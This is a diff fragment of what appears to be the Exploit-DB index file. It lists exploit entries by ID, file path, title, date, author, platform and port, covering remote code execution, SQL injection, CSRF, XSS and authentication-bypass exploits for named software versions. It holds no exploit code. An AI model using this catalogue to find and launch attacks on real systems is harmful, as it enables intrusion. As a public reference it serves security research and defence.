44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows, -44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100 +44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100 +44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows, +44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080 +44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39321,3 +39325,7 @@ id,file,description,date,author,type,platform,port 44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp, 44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80 44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java, +44636,exploits/php/webapps/44636.txt,"NodAPS 4.0 - SQL injection / Cross-Site Request Forgery",2018-05-17,L0RD,webapps,php, +44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware, +44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php, +44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,